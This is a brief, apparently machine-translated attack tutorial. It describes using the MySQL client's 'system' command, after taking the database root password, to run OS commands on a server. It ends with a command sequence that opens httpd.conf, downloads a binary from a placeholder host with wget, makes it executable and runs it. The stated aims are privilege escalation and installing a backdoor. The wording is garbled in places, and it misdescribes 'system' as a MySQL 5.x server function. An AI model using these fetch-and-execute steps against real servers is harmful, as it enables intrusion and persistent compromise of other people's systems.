Mysql 5. x introduces a system function. This function can execute system commands. when mysql logs in as root, it can be used to execute commands, of course, within the permitted range.
Generally, after obtaining the mysql root Password, we connect to create a table, outfile, get a webshell, and then escalate the permission. Today we use another method.
According to the above method, we need to know the absolute path of the web. Of course, this is not easy to find. Some sqlinjection may be displayed when an error is reported, but some may not be. However, according to my method, there is no need to find the web path and directly execute
In this way, we can find the web path. Of course, our goal is not to find the web path and put webshell in. We want to do other things, such as downloading exp execution, obtaining root permissions, and installing a backdoor.
Mysql> system vi/etc/httpd/conf/httpd. conf;
Mysql> system wget http://www.xxx.com/xxxx;
Mysql> system chmod + x xxxx; mysql> system./xxxx;